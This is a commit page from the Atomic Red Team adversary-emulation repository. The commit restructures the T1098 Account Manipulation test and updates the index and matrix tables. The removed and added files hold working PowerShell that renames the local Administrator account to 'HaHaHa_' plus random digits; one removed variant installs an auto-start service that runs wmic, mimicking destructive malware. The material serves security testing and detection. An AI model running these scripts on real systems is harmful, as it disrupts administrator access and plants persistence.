security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Merge pull request #199 from redcanaryco/T1098-yamilze

Browse Source 
T1098 yamilze
This commit is contained in:
caseysmithrc
2018-05-24 20:53:12 -06:00
committed by GitHub
parent e348b4e33a fb88ed2f85
commit 60fceef57b
7 changed files with 86 additions and 66 deletions
Download Patch File Download Diff File Expand all files Collapse all files
Windows/Credential_Access/Account_Manipulation.md
-62
View File
@@ -1,62 +0,0 @@
# Account Manipulation
MITRE ATT&CK Technique: [T1098](https://attack.mitre.org/wiki/Technique/T1098)
Adapted from [Operation Blockbuster](https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf)
## Example 1
If successful, the Administrator account will be renamed with `HaHaHa_` followed by 4 to 16 digits.
$x = Get-Random -Minimum 2 -Maximum 9999
$y = Get-Random -Minimum 2 -Maximum 9999
$z = Get-Random -Minimum 2 -Maximum 9999
$w = Get-Random -Minimum 2 -Maximum 9999
Write-Host HaHaHa_$x$y$z$w
$hostname = (Get-CIMInstance CIM_ComputerSystem).Name
$fmm = Get-CimInstance -ClassName win32_group -Filter "name = 'Administrators'" | Get-CimAssociatedInstance -Association win32_groupuser | Select Name
foreach($member in $fmm) {
if($member -like "*Administrator*") {
Rename-LocalUser -Name $member.Name -NewName "HaHaHa_$x$y$z$w"
Write-Host "Successfully Renamed Administrator Account on" $hostname
}
}
## Example 2
If successful, the Administrator account will be renamed with `HaHaHa_` followed by 4 to 8 digits.
$x = Get-Random -Minimum 2 -Maximum 99
$y = Get-Random -Minimum 2 -Maximum 99
$z = Get-Random -Minimum 2 -Maximum 99
$w = Get-Random -Minimum 2 -Maximum 99
$newadmin = "HaHaHa_$x$y$z$w".ToString()
$serviceName = "Rename Account Service"
$serviceDisplayName = "Rename Account Service"
$serviceDescription = "Rename Account Service"
$serviceExecutable = "wmic useraccount where name='Administrator' rename '$newadmin'"
if (Get-Service $serviceName -ErrorAction SilentlyContinue)
{
$serviceToRemove = Get-WmiObject -Class Win32_Service -Filter "name='$serviceName'"
$serviceToRemove | Stop-Service
$serviceToRemove.delete()
}
else
{
"service does not exists"
}
Write-Host "Installing service: $serviceName"
New-Service -name $serviceName -displayName $serviceDisplayName -binaryPathName $serviceExecutable -startupType Automatic -Description $serviceDescription
Write-Host "Installation completed: $serviceName"
Write-Host "Trying to start new service: $serviceName"
$serviceToStart = Get-WmiObject -Class Win32_Service -Filter "name='$serviceName'"
$serviceToStart.startservice()
Write-Host "Service started: $serviceName"
atomics/T1098/T1098.md
+47
View File
@@ -0,0 +1,47 @@
# T1098 - Account Manipulation
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1098)
<blockquote>Account manipulation may aid adversaries in maintaining access to credentials and certain permission levels within an environment. Manipulation could consist of modifying permissions, modifying credentials, adding or changing permission groups, modifying account settings, or modifying how authentication is performed. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain.
Detection: Collect events that correlate with changes to account objects on systems and the domain, such as event ID 4738. (Citation: Microsoft User Modified Event) Monitor for modification of accounts in correlation with other suspicious activity. Changes may occur at unusual times or from unusual systems. Especially flag events where the subject and target accounts differ (Citation: InsiderThreat ChangeNTLM July 2017) or that include additional flags such as changing a password without knowledge of the old password. (Citation: GitHub Mimikatz Issue 92 June 2017)
Use of credentials may also occur at unusual times or to unusual systems or services and may correlate with other suspicious activity.
Platforms: Windows
Data Sources: Authentication logs, API monitoring, Windows event logs, Packet capture
Permissions Required: Administrator</blockquote>
## Atomic Tests
- [Atomic Test #1 - Admin Account Manipulate](#atomic-test-1---admin-account-manipulate)
<br/>
## Atomic Test #1 - Admin Account Manipulate
Manipulate Admin Account Name
**Supported Platforms:** Windows
#### Run it with `powershell`!
```
$x = Get-Random -Minimum 2 -Maximum 9999
$y = Get-Random -Minimum 2 -Maximum 9999
$z = Get-Random -Minimum 2 -Maximum 9999
$w = Get-Random -Minimum 2 -Maximum 9999
Write-Host HaHaHa_$x$y$z$w
$hostname = (Get-CIMInstance CIM_ComputerSystem).Name
$fmm = Get-CimInstance -ClassName win32_group -Filter "name = 'Administrators'" | Get-CimAssociatedInstance -Association win32_groupuser | Select Name
foreach($member in $fmm) {
if($member -like "*Administrator*") {
Rename-LocalUser -Name $member.Name -NewName "HaHaHa_$x$y$z$w"
Write-Host "Successfully Renamed Administrator Account on" $hostname
}
}
```
<br/>
atomics/T1098/T1098.yaml
+33
View File
@@ -0,0 +1,33 @@
---
attack_technique: T1098
display_name: Account Manipulation
atomic_tests:
- name: Admin Account Manipulate
description: |
Manipulate Admin Account Name
supported_platforms:
- windows
input_arguments:
executor:
name: powershell
command: |
$x = Get-Random -Minimum 2 -Maximum 9999
$y = Get-Random -Minimum 2 -Maximum 9999
$z = Get-Random -Minimum 2 -Maximum 9999
$w = Get-Random -Minimum 2 -Maximum 9999
Write-Host HaHaHa_$x$y$z$w
$hostname = (Get-CIMInstance CIM_ComputerSystem).Name
$fmm = Get-CimInstance -ClassName win32_group -Filter "name = 'Administrators'" | Get-CimAssociatedInstance -Association win32_groupuser | Select Name
foreach($member in $fmm) {
if($member -like "*Administrator*") {
Rename-LocalUser -Name $member.Name -NewName "HaHaHa_$x$y$z$w"
Write-Host "Successfully Renamed Administrator Account on" $hostname
}
}
atomics/index.md
+2 -1
View File
@@ -263,7 +263,8 @@
- [T1124 System Time Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
# credential-access
- [T1098 Account Manipulation](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1098 Account Manipulation](./T1098/T1098.md)
- Atomic Test #1: Admin Account Manipulate [windows]
- [T1139 Bash History](./T1139/T1139.md)
- Atomic Test #1: xxxx [linux, macos]
- [T1110 Brute Force](./T1110/T1110.md)
atomics/matrix.md
+1 -1
View File
@@ -1,7 +1,7 @@
# All Atomic Tests by ATT&CK Tactic & Technique
| initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control |
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
| [Drive-by Compromise](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [AppleScript](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [.bash_profile and .bashrc](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Access Token Manipulation](./T1134/T1134.md) | [Access Token Manipulation](./T1134/T1134.md) | [Account Manipulation](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Account Discovery](./T1087/T1087.md) | [AppleScript](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Audio Capture](./T1123/T1123.md) | [Automated Exfiltration](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Commonly Used Port](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
| [Drive-by Compromise](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [AppleScript](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [.bash_profile and .bashrc](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Access Token Manipulation](./T1134/T1134.md) | [Access Token Manipulation](./T1134/T1134.md) | [Account Manipulation](./T1098/T1098.md) | [Account Discovery](./T1087/T1087.md) | [AppleScript](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Audio Capture](./T1123/T1123.md) | [Automated Exfiltration](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Commonly Used Port](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
| [Exploit Public-Facing Application](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [CMSTP](./T1191/T1191.md) | [Accessibility Features](./T1015/T1015.md) | [Accessibility Features](./T1015/T1015.md) | [BITS Jobs](./T1197/T1197.md) | [Bash History](./T1139/T1139.md) | [Application Window Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Application Deployment Software](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Automated Collection](./T1119/T1119.md) | [Data Compressed](./T1002/T1002.md) | [Communication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
| [Hardware Additions](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Command-Line Interface](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [AppCert DLLs](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [AppCert DLLs](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Binary Padding](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Brute Force](./T1110/T1110.md) | [Browser Bookmark Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Distributed Component Object Model](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Clipboard Data](./T1115/T1115.md) | [Data Encrypted](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Connection Proxy](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
| [Replication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Control Panel Items](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [AppInit DLLs](./T1103/T1103.md) | [AppInit DLLs](./T1103/T1103.md) | [Bypass User Account Control](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Credential Dumping](./T1003/T1003.md) | [File and Directory Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Exploitation of Remote Services](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Data Staged](./T1074/T1074.md) | [Data Transfer Size Limits](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Custom Command and Control Protocol](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
atomics/windows-index.md
+2 -1
View File
@@ -203,7 +203,8 @@
- [T1124 System Time Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
# credential-access
- [T1098 Account Manipulation](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1098 Account Manipulation](./T1098/T1098.md)
- Atomic Test #1: Admin Account Manipulate [windows]
- [T1110 Brute Force](./T1110/T1110.md)
- Atomic Test #1: Brute Force Credentials [windows]
- [T1003 Credential Dumping](./T1003/T1003.md)
atomics/windows-matrix.md
+1 -1
View File
@@ -1,7 +1,7 @@
# Windows Atomic Tests by ATT&CK Tactic & Technique
| initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control |
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
| [Drive-by Compromise](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [CMSTP](./T1191/T1191.md) | [Accessibility Features](./T1015/T1015.md) | [Access Token Manipulation](./T1134/T1134.md) | [Access Token Manipulation](./T1134/T1134.md) | [Account Manipulation](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Account Discovery](./T1087/T1087.md) | [Application Deployment Software](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Audio Capture](./T1123/T1123.md) | [Automated Exfiltration](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Commonly Used Port](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
| [Drive-by Compromise](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [CMSTP](./T1191/T1191.md) | [Accessibility Features](./T1015/T1015.md) | [Access Token Manipulation](./T1134/T1134.md) | [Access Token Manipulation](./T1134/T1134.md) | [Account Manipulation](./T1098/T1098.md) | [Account Discovery](./T1087/T1087.md) | [Application Deployment Software](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Audio Capture](./T1123/T1123.md) | [Automated Exfiltration](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Commonly Used Port](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
| [Exploit Public-Facing Application](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Command-Line Interface](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [AppCert DLLs](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Accessibility Features](./T1015/T1015.md) | [BITS Jobs](./T1197/T1197.md) | [Brute Force](./T1110/T1110.md) | [Application Window Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Distributed Component Object Model](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Automated Collection](./T1119/T1119.md) | [Data Compressed](./T1002/T1002.md) | [Communication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
| [Hardware Additions](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Control Panel Items](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [AppInit DLLs](./T1103/T1103.md) | [AppCert DLLs](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Binary Padding](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Credential Dumping](./T1003/T1003.md) | [Browser Bookmark Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Exploitation of Remote Services](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Clipboard Data](./T1115/T1115.md) | [Data Encrypted](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Connection Proxy](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
| [Replication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Dynamic Data Exchange](./T1173/T1173.md) | [Application Shimming](./T1138/T1138.md) | [AppInit DLLs](./T1103/T1103.md) | [Bypass User Account Control](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Credentials in Files](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [File and Directory Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Logon Scripts](./T1037/T1037.md) | [Data Staged](./T1074/T1074.md) | [Data Transfer Size Limits](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Custom Command and Control Protocol](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |